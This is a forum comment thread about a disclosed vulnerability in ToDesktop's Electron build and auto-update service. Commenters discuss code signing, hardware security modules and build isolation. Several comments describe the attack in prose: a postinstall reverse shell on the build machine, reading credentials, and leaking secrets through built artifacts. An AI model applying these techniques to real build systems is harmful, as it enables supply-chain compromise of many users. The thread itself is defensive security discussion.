Readit News logoReadit News
felixrieseberg · 6 months ago
As an Electron maintainer, I'll re-iterate a warning I've told many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-sign certificate is close to the top of my personal nightmares.

Dave and toDesktop have build a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chain in those processes.

If you're an Electron developer (like the apps mentioned), I recommend:

* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.

* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.

* You probably want to rotate your certificates if you ever gave anyone else access.

* Lastly, you should probably be the only one with the keys to your update server.

RadiozRadioz · 6 months ago
How about we don't build an auto-updater? Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible. Touching files on a user's system should be treated as a rare special occurrence. If a server is involved with the app, build a stable interface and think long and hard about every change. Meticulously version and maintain everything. If a server is involved, it is completely unacceptable for a server-side change to break an existing user's local application unless it is impossible to avoid - it should be seen as an absolute last resort with an apology to affected customers (agree with OP on this one).

It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).

You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.

Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.

We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).

Hackbraten · 6 months ago
> Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible.

That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.

PeterStuer · 6 months ago
Sounds like you come from the B2B, consultancyware or 6÷ figure/year license world.

For the vast realm of <300$/year products, the ones that actually use updaters, all your suggestions are completely unviable.

klabb3 · 6 months ago
> How about we don't build an auto-updater?

Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).

> we should try our best to release complete software to users that will work as close to forever as possible

This isn’t feasible. Last I tried to support old systems on my app, the vendor (Apple) had stopped supporting and didn’t even provide free VMs. Windows 10 is scheduled for non-support this year (afaik). On Linux glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.

> Touching files on a user's system should be treated as a rare special occurrence.

Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?

> If a server is involved with the app, build a stable interface and think long and hard about every change.

Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.

Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.

At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.

I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.

theragra · 6 months ago
For me, Windows is thousand years ahead in this regard. I download software, and run it. And it works 99.9% of the time. Yes, I have a chance of getting a virus. Happened one time in 30 years I'm using Windows. (More in DOS times).

Linux, I got burned again yesterday. Proxmox distribution has no package I need in their repository.

I am trying to use Ubuntu package - does not work.

I try to use debian - too old version.

How do I solve this? By learning some details of how the Linux distributions and repositories work, struggling some more and finding customly built version of .deb. Okay, I can do it, kinda, but what about non-IT person?

Software without dependencies is awesome. So, docker is something I respect a lot, because it allows the same model (kinda).

pjmlp · 6 months ago
Windows Store and winget. Developers are the ones behind the times.
rs186 · 6 months ago
> How about we don't build an auto-updater?

Auto-updaters are the most practical and efficient way of pushing updates in today's world. As pointed out by others, the alternative would be to go through app store's update mechanism, if the app is distributed via app store in the first place, and many people avoid Microsoft store/MacOS app store whenever possible. And no developer likes that process.

pjerem · 6 months ago
I do agree with you but I think that unfortunately you are wrong on the job of updates. You have an idealistic vision that I share but well, it remains idealistic.

Apart from, maybe, Linux distros, neither Apple or Microsoft are providing anything to handle updates that isn’t a proprietary store with shitty rules.

For sure the rules are broken on desktop OSs but by the meantime, you still have to distribute and update your software. Should the update be automatic ? No. Should you provide an easy way to update ? I’d said that at the end it depends on if you think it’s important to provide updates to your users. But should you except your users or their OSs to somehow update your app by themselves ? Nope.

itsthecourier · 6 months ago
I have clients who have been running for more than 10 years in old versions for diverse reasons. I design a layer of backward compatibility in our apis to keep updating optional. it works well
rustcleaner · 6 months ago
This one is right.

Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.

Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.

account42 · 6 months ago
Signing a revocation doesn't magically inform all affected devices. In practice this is equivalent to pushing an update that replaces the root key.
Sytten · 6 months ago
I mean sure but is that possible for OS builds? Generally you will generate a private key, get a cert for it, give it to Apple so they sign it with their key and then you use the private key to sign your build. I have never seen a guide do a two level process and I am nof convinced it is allowed.
oncallthrow · 6 months ago
> It can be on tape, or optical, or silicon, or paper.

You can pick up a hardware security module for a few thousand bucks. No excuse not to.

TZubiri · 6 months ago
Question.

I've noticed a lot of websites import from other sites, instead of local.

<script src="scriptscdn.com/libv1.3">

I almost never see a hash in there. Is this as dangerous as it looks, why don't people just use a hash?

bastawhiz · 6 months ago
1. Yes

2. Because that requires you to know how to find the hash and add it.

Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML in the first place?) but they aren't incentivizes to have other sites use a hash.

valenterry · 6 months ago
Yes it is. Hashes must absolutely be used in that case.
paradite · 6 months ago
Hi. I'm an electron app developer. I use electron builder paired with AWS S3 for auto update.

I have always put Windows signing on hold due to the cost of commercial certificate.

Is the Azure Trusted Signing significantly cheaper than obtaining a commercial certificate? Can I run it on my CI as part of my build pipeline?

felixrieseberg · 6 months ago
Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.

I wrote @electron/windows-sign specifically to cover it: https://github.com/electron/windows-sign

Reference implementation: https://github.com/felixrieseberg/windows95/blob/master/forg...

mckravchyk · 6 months ago
> No magic.

There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)

hinkley · 6 months ago
Code signing is a really excellent place to look at ponying up the money for one of those hardware security modules that triggers sticker shock. The ones on their own PCI card with potted chips and optional Byzantine Generals access cards and consultants wearing ties. It’s cheaper than blowing six months of developer time trying to fake it (remember it will always take you twice as long as you think it will)

I built one code signing system after being the “rubber duck” for a gentleman who built another, and both used HSM cards and not cheap ones. Not those shitty little USB ones. One protected cellphones, the other protected commercial aviation.

Deleted Comment

filleokus · 6 months ago
> For Windows signing, use Azure Trusted Signing

I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.

I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?

Not sure if this is FUD spread by the EV CA's or not though?

gschier · 6 months ago
Im not sure if they're technically considered EV but mine is linked to my corporation and I get no virus warnings at all during install.

Dead Comment

Dead Comment

jbverschoor · 6 months ago
You know, there's this nice little thing called AppStore on the mac, and it can auto update
woadwarrior01 · 6 months ago
All apps on the Mac AppStore have to be sandboxed, which is great for the end-user, but a pain in the neck for the run of the mill electron app dev.
gamedever · 6 months ago
And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do to same things to every dev usings those services.

github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.

IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for and then for each repo, the specific permissions needed. They should be designed that minimal permissions is encouraged.

As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"

madeofpalk · 6 months ago
Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` can grab a token for all the code you push up.

By design, the gh cli wants write access to everything on github you can access.

charrondev · 6 months ago
I will note that at least for our GitHub enterprise setup permissions are all granular, tokens are managed by the org and require an approval process.

I’m not sure how much of this is “standard” for an org though.

xmprt · 6 months ago
I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?
cdmyrm · 6 months ago
Yeah, turns out "modern" software development has more holes than Swiss cheese. What else is new?
101008 · 6 months ago
Question that I hope you can help me. I'm working on a Electron app that works offline. I am plan to sell it cheap, like $5 one payment.

It won't have licenses or anything, so if somebody wants to distribute it outside my website they will be able to do it.

If I just want to point to a exe file link in S3 without auto updates, should just compile and upload be enough?

davej · 6 months ago
Dave here, founder of ToDesktop. I've shared a write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...

This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.

spudlyo · 6 months ago
> cannot happen again.

Hubris. Does not inspire confidence.

> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.

After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?

davej · 6 months ago
Fair point. Perhaps better phrased as "to ensure this scenario can't recur.". I'll edit my post.

Yes, we re-architected our build container as part of remediation efforts, it was quite significant.

abhiaagarwal · 6 months ago
Based on the claims on the blog, it feels reasonable to say that this "cannot" occur again.

Dead Comment

BonusPlay · 6 months ago
Honestly I don't get why people are hating this response so much.

Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.

> we've fundamentally restructured our security practices to ensure this scenario can't recur

People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".

To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.

So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).

davej · 6 months ago
Thank you.

Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.

Our disclosure write-up: https://www.todesktop.com/blog/posts/security-incident-at-to...

AlexCoventry · 6 months ago
> We have reviewed logs and inspected app bundles.

Were the logs independent of firebase? (Could someone exploiting this vulnerability have cleaned up after themselves in the logs?)

hakaneskici · 6 months ago
How can -let's say- Cursor users be sure they were not compromised?

> No malicious usage was detected

Curious to hear about methods used if OK to share, something like STRIDE maybe?

Centigonal · 6 months ago
from todesktop's report:

> Completed a review of the logs. Confirming all identified activity was from the researcher (verified by IP Address and user agent).

beardedwizard · 6 months ago
Annual pen tests are great, but what are you doing to actually improve the engineering design process that failed to identify this gap? How can you possibly claim to be confident this won't happen again unless you myopically focus on this single bug, which itself is a symptom of a larger design problem.

These kinds of "never happen again" statements never age well, and make no sense to even put forward.

A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...

Deleted Comment

Deleted Comment

UltraSane · 6 months ago
Critical private keys must be stored on HSMs or they will be compromised.
ec109685 · 6 months ago
What horrible form not contacting affected customers right away after performing the patch.

Who knows what else was vulnerable in your infrastructure when you leaked .encrypted like that.

It should have been on your customers to decide if they still wanted to use your services.

edm0nd · 6 months ago
how much of a bounty was paid to Eva for this finding?
richardboegli · 6 months ago
> they were nice enough to compensate me for my efforts and were very nice in general.

They were compensated, but doesn't elaborate.

eviks · 6 months ago
> for those wondering, in total i got 5k for this vuln

Deleted Comment

nyolfen · 6 months ago
no offense man but this is totally inexcusable and there is zero chance i am ever touching anything made by y'all, ever
cdmyrm · 6 months ago
Good call. I'd seriously considering firing the developers responsible, too.

Dead Comment

Dead Comment

TZubiri · 6 months ago
Don't worry man, it's way more embarassing for the people that downloaded your dep or any upstream tool.

If they didn't pay you a cent, you have no liability here.

remram · 6 months ago
This is not how the law works anywhere, thankfully.
sky2224 · 6 months ago
This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/

So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.

999900000999 · 6 months ago
Firebase let's anyone get started in 30 seconds.

Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.

I use firebase essentially for hobbyist projects for me and my friends.

If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.

bastawhiz · 6 months ago
> Google isn't to blame if you ship a paid product without running a security audit.

Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.

nightpool · 6 months ago
I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.
itsnotvalid · 6 months ago
Agreed. I recently stumbled upon the fact that even Hacker News is using Firebase for exposing an API for articles. Caution should be taken when writing server-side software in general.
valenterry · 6 months ago
The problem is that if there is a security incident, basically nobody cares except for some of us here. Normal people just ignore it. Until that changes, nothing you do will change the situation.
cdmyrm · 6 months ago
I'm sorry, but when will we hold the writers of crappy code responsible for their own bad decisions? Let's start there.
notpachet · 6 months ago
I don't know but we're in a thread about Cursor... I don't think anyone is writing significantly better code using Cursor.
brabel · 6 months ago
I always find unbelievable how we NEVER hold developers accountable. Any "actual" Engineer would be (at least the one signing off, but in software developers never sign off anything - and maybe that's the problem).
swiftcoder · 6 months ago
> update: cursor (one of the affected customers) is giving me 50k USD for my efforts.

Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.

mcoliver · 6 months ago
"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"

Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.

TheDong · 6 months ago
In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?

Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?

And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.

The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.

arccy · 6 months ago
It's common, doesn't mean it's secure. A lot of linux distros in their packaging will separate download (allows outbound to fetch dependencies), from build (no outside access).

Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.

ndriscoll · 6 months ago
Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
gtirloni · 6 months ago
In a world with an internal proxy/mirror for dependencies and no internet access allowed by build systems.
fc417fc802 · 6 months ago
If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
zahlman · 6 months ago
> The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.

If you're providing a build container service then you pretty much have to run untrusted code (the customer's) in the container, yes? So then the problem is really just the bad Firebase config... ?

mcoliver · 6 months ago
There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:

- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.

Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.

I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.

katbyte · 6 months ago
you use a language where you have all your deps local to the repo? ie go vendor?
areyourllySorry · 6 months ago
you can always limit said network access to npm.
cdmyrm · 6 months ago
It's called air-gapping, and lots of adults do it.
trallnag · 6 months ago
Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access
tomjakubowski · 6 months ago
Indeed, you can indeed punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.
arccy · 6 months ago
A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.
selfhoster · 6 months ago
It is and regardless a few other commenters saying or hinting it isn't...it is. An air gapped build machine wouldn't work for most software built today.
leni536 · 6 months ago
Note that without a reverse shell you could still leak the secrets in the built artifact itself.
permo-w · 6 months ago
I'm a huge fan of the writing style. it's like hacking gonzo, but with literally 0 fluff. amazing work and an absolute delight to read from beginning to end

Dead Comment

GuestFAUniverse · 6 months ago
" please do not harass these companies or make it seem like it's their fault, it's not. it's todesktop's fault if anything) "

I don't get it. Why would it be "todesktop's fault", when all the mentioned companies allowed to push updates?

I had these kind of discussions with naive developers giving _full access_ to GitHub orgs to various 3rd party apps -- that's never right!

stefan_ · 6 months ago
Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.
floydnoel · 6 months ago
it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.
asciii · 6 months ago
> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload

From ToDesktop incident report,

> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.

I'm curious to know what the trial/error here was to get their machine to spit out the build or if it was in one-shot

hassleblad23 · 6 months ago
I would start by dumping the enviornment variables and directory structure.